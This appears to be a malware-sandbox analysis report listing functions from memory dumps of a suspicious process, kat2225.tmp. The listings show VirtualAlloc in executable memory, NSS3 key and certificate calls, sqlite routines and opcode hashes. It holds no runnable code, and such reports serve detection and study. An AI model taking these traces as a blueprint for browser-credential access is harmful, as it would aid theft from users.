Function 043B9B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.tex, xrefs: 043B9BD4

Memory Dump Source

Source File: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_43b9000_5358.jbxd

Yara matches

Similarity

API ID:
String ID: .tex
API String ID: 0-1946526065
Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
Instruction ID: 0599bec1e3753ca40ed17e7081ead6b2e4055d42e4de369d8d31e348503a0253
Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
Instruction Fuzzy Hash: 1B51E6B1E00109DFCB04CF84C894BEEFBB5EF48314F249599DA15AB691D735AA85CBA0

Function 043B9FB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,043B990F,00003000,00000040), ref: 043BA034

Strings

VirtualAlloc, xrefs: 043BA019, 043BA01C

Memory Dump Source

Source File: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_43b9000_5358.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction ID: ff38c595f64a7f1bb37983250ea3cfad19e053c6b19e3658704551b9d5949bd5
Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
Instruction Fuzzy Hash: 9A11D360D083C9EAFB01D7E894097EEBFB55F11708F044098D6846A282D6BA575887E6

Analysis Process: kat2225.tmpPID: 6716, Parent PID: 4296COMMON

Non-executed Functions

Function 6CD1C8C0 Relevance: 25.9, APIs: 17, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD1CA51
TlsGetValue.KERNEL32 ref: 6CD1CAE8
EnterCriticalSection.KERNEL32(?), ref: 6CD1CAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6CD1CB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6CD1CB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6CD1CBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CD1CCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD1CCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6CD1CD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6CD1CD73
memcpy.VCRUNTIME140(?,?,?), ref: 6CD1CD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6CD1CDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6CD1CE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CD1CE17
PK11_FreeSymKey.NSS3(00000000), ref: 6CD1CE24
PR_Unlock.NSS3 ref: 6CD1CE49
PK11_FreeSymKey.NSS3(00000000), ref: 6CD1CE96

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID:
API String ID: 3685077037-0
Opcode ID: 62266ccbd9b97e3b2c3f4b576c2dcab0c51f631775f44455a2c5df85e654becc
Instruction ID: 6f5f8e6e8183cefe41a125ced59b9cb3096bc96a819edf92097a6bd6d31fe55f
Opcode Fuzzy Hash: 62266ccbd9b97e3b2c3f4b576c2dcab0c51f631775f44455a2c5df85e654becc
Instruction Fuzzy Hash: A2F1D3B1E08214CBEB11EF14EC817AA73B4EF85348F1440B9D909A7F61E734DA95CB96

Function 6CD0EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CD0C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CD0DAE2,?), ref: 6CD0C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD0F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD0F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CD0F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD0F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CDD218C), ref: 6CD0F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CD0F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD0F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CD0F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CD0F210

Part of subcall function 6CCB52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CD0F1E9,?,00000000,?,?), ref: 6CCB52F5
Part of subcall function 6CCB52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CCB530F
Part of subcall function 6CCB52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CCB5326
Part of subcall function 6CCB52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CD0F1E9,?,00000000,?,?), ref: 6CCB5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD0F227

Part of subcall function 6CCFFAB0: free.MOZGLUE(?,-00000001,?,?,6CC9F673,00000000,00000000), ref: 6CCFFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CD0F23E

Part of subcall function 6CCFBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CCAE708,00000000,00000000,00000004,00000000), ref: 6CCFBE6A
Part of subcall function 6CCFBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CCB04DC,?), ref: 6CCFBE7E
Part of subcall function 6CCFBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CCFBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CD0F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CD0F3A8

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CD0F3B3

Part of subcall function 6CCB2D20: PK11_DestroyObject.NSS3(?,?), ref: 6CCB2D3C
Part of subcall function 6CCB2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CCB2D5F

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 9dd59d7881d3f9a351d75d04803a4c7ddda7e839360d4875665e5570815826bb
Instruction ID: 641afb931154871223f5459acbf47c205bc5852a7d9e4fc232f077ccbb5b59f4
Opcode Fuzzy Hash: 9dd59d7881d3f9a351d75d04803a4c7ddda7e839360d4875665e5570815826bb
Instruction Fuzzy Hash: 35D14CB6E01605DBEB14CFADD880A9EB7B5EF48318F258029D915A7721EB31E806CB54

Function 6CCD0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CCD0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CCD0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CCD1006
PK11_FreeSymKey.NSS3(?), ref: 6CCD101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CCD1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CCD103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CCD1048
memcpy.VCRUNTIME140(?,?,?), ref: 6CCD108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CCD10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CCD10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CCD112E

Part of subcall function 6CCD1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CCD08C4,?,?), ref: 6CCD15B8
Part of subcall function 6CCD1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CCD08C4,?,?), ref: 6CCD15C1
Part of subcall function 6CCD1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCD162E
Part of subcall function 6CCD1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCD1637

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 53fdf30b885568ab31fabbe153fea50a47056105683712483db07d3b722b6e52
Instruction ID: 9644fbde99a214f8383eb8abe28db1f5d08ee7614a177d66cd92bcc694d01a1f
Opcode Fuzzy Hash: 53fdf30b885568ab31fabbe153fea50a47056105683712483db07d3b722b6e52
Instruction Fuzzy Hash: 5371C0B1A042059FDB04DFA9C880A6AB7F4FF48328F158629E61997711F731F985CB91

Function 6CCF6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CCA1C6F,00000000,00000004,?,?), ref: 6CCF6C3F

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CCA1C6F,00000000,00000004,?,?), ref: 6CCF6C60
PR_ExplodeTime.NSS3(00000000,6CCA1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CCA1C6F,00000000,00000004,?,?), ref: 6CCF6C94

Strings

gfff, xrefs: 6CCF6D66
gfff, xrefs: 6CCF6D9C
gfff, xrefs: 6CCF6CFD
gfff, xrefs: 6CCF6D30
gfff, xrefs: 6CCF6CF5

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 2a3ac0bfecb595a8e18abfbc3a0bccb3a9746753175a813a75c9f828a38cca50
Instruction ID: 4cfecf1fe5c99c7d14e48ba284c9e186b8edf07ea154902e479fe3d8f23f513f
Opcode Fuzzy Hash: 2a3ac0bfecb595a8e18abfbc3a0bccb3a9746753175a813a75c9f828a38cca50
Instruction Fuzzy Hash: C6514D72B015494FC70CCEADDC627DAB7DAABA4310F48C23AE441DB785E678D906C751

Function 6CD70F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CD71027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CD710B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD71353

Strings

'%.*q', xrefs: 6CD71217, 6CD71292
NULL, xrefs: 6CD7119E
-- , xrefs: 6CD70FF5
zeroblob(%d), xrefs: 6CD71223
%02x, xrefs: 6CD712F6
%lld, xrefs: 6CD7114B
$, xrefs: 6CD712A0

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 2a69d4557e1d54e1f44923f9a429a289947b31b03acee0061112bbc0bf5a0281
Instruction ID: 43232f9829ac7a0b3cca4beeee949ae857afa4cb1480177a92f7c09e34948598
Opcode Fuzzy Hash: 2a69d4557e1d54e1f44923f9a429a289947b31b03acee0061112bbc0bf5a0281
Instruction Fuzzy Hash: 0DE18E71A08340DFD724CF14C490A6BBBF1AF85348F148A1DE9D98BB61E771E849CB62

Function 6CD78FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CD78FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD790DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD79118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD7915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD791C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD79209

Strings

UUUU, xrefs: 6CD79255
3333, xrefs: 6CD7925E

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: a32adc7305b6633d3d6a7e1d4a6a9ed50e2113c11822f218aa3e80134833dc4d
Instruction ID: 832571c0f700664941cd4bed6c33086c4ce3ee466304eb3355a316642fcbcd8e
Opcode Fuzzy Hash: a32adc7305b6633d3d6a7e1d4a6a9ed50e2113c11822f218aa3e80134833dc4d
Instruction Fuzzy Hash: 17A1CE72E001159BDB14CB68CC84BAEB7B5BF48324F094129E905B77A1E736EC11CBE1

Function 6CC30FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6CC2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CC8F9C9,?,6CC8F4DA,6CC8F9C9,?,?,6CC5369A), ref: 6CC2CA7A
Part of subcall function 6CC2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CC2CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CC3103E
EnterCriticalSection.KERNEL32(?), ref: 6CC31139
LeaveCriticalSection.KERNEL32(?), ref: 6CC31190
sqlite3_free.NSS3(00000000), ref: 6CC31227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CC3126E
sqlite3_free.NSS3(?), ref: 6CC3127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CC31267
winAccess, xrefs: 6CC3129B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: 6dbf5a0b2e8da6bfd36af26053cfb52af9286a2fb2eb0d7fff5f097a8199cf64
Instruction ID: 84c7a7ab85e7220effb1055ba1568a9ee6599ec1a927f857073760747fbffb74
Opcode Fuzzy Hash: 6dbf5a0b2e8da6bfd36af26053cfb52af9286a2fb2eb0d7fff5f097a8199cf64
Instruction Fuzzy Hash: 6F712B327042219FEB049F69FC45A9A33B6FB86314F141229E929D7A90FB31D905C7D2

Function 6CC3AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CD5CF46,?,6CC2CDBD,?,6CD5BF31,?,?,?,?,?,?,?), ref: 6CC3B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CD5CF46,?,6CC2CDBD,?,6CD5BF31), ref: 6CC3B090
sqlite3_free.NSS3(?,?,?,?,?,?,6CD5CF46,?,6CC2CDBD,?,6CD5BF31), ref: 6CC3B0A2
CloseHandle.KERNEL32(?,?,6CD5CF46,?,6CC2CDBD,?,6CD5BF31,?,?,?,?,?,?,?,?,?), ref: 6CC3B100
sqlite3_free.NSS3(?,?,00000002,?,6CD5CF46,?,6CC2CDBD,?,6CD5BF31,?,?,?,?,?,?,?), ref: 6CC3B115
sqlite3_free.NSS3(?,?,?,?,?,?,6CD5CF46,?,6CC2CDBD,?,6CD5BF31), ref: 6CC3B12D

Part of subcall function 6CC29EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CC3C6FD,?,?,?,?,6CC8F965,00000000), ref: 6CC29F0E
Part of subcall function 6CC29EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CC8F965,00000000), ref: 6CC29F5D

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: e423acf0236fa8669413f296f9607648edaadabcedf2cf400951a27e9bfb5cff
Instruction ID: 603a0b50599db3fa846734644c6ffa911ca37ef26a46d6f2b4117b47f803f182
Opcode Fuzzy Hash: e423acf0236fa8669413f296f9607648edaadabcedf2cf400951a27e9bfb5cff
Instruction Fuzzy Hash: CA9102B1A006158FEB04CFA5EC84B6BB7B2FF89308F14562DE41A97A50F735E464CB91

Function 6CDB8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CE014E4,6CD6CC70), ref: 6CDB8D47
PR_GetCurrentThread.NSS3 ref: 6CDB8D98

Part of subcall function 6CC90F00: PR_GetPageSize.NSS3(6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000,?,6CC2204A), ref: 6CC90F1B
Part of subcall function 6CC90F00: PR_NewLogModule.NSS3(clock,6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000,?,6CC2204A), ref: 6CC90F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CDB8E7B
htons.WSOCK32(?), ref: 6CDB8EDB
PR_GetCurrentThread.NSS3 ref: 6CDB8F99
PR_GetCurrentThread.NSS3 ref: 6CDB910A

Strings

%u.%u.%u.%u, xrefs: 6CDB8E74

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: a813846b646fa63329977219010bfab6cedfe7de780b03709026b0abc7d09c5e
Instruction ID: 9cb4878911e9f13adbd027307836ad9c556088eb3c027924e6303bf684728aa6
Opcode Fuzzy Hash: a813846b646fa63329977219010bfab6cedfe7de780b03709026b0abc7d09c5e
Instruction Fuzzy Hash: DE029AB1906292CFDB148F19C85836ABBB2EF52344F1A825FD8976FAB1C331D905C790

Function 6CDBCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CDBD086
PR_Malloc.NSS3(00000001), ref: 6CDBD0B9
PR_Free.NSS3(?), ref: 6CDBD138

Strings

>, xrefs: 6CDBCF5B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 47ee4119556f4adc7fbcce41a9a1b9cf7b7b434592528df6395161e64a6a205f
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: A6D15BE2B415464BEB144B7C88613EA779397823B4F58432AD563BBBFDE639C8438301

Function 6CD5AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f041f749aab2688a6d0bdfd4698035bb1214006eb809653ce9f3ff5a2c5b502
Instruction ID: cdcfc80f82107216ae0be4446e075cadfac2079cf6e2ac1639a7de58e598bae3
Opcode Fuzzy Hash: 1f041f749aab2688a6d0bdfd4698035bb1214006eb809653ce9f3ff5a2c5b502
Instruction Fuzzy Hash: ECF10171F012558BEF04CF68E8407A977F5BB4A308F55422EDA25DBBA0E7709961CBD0

Function 6CC98EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

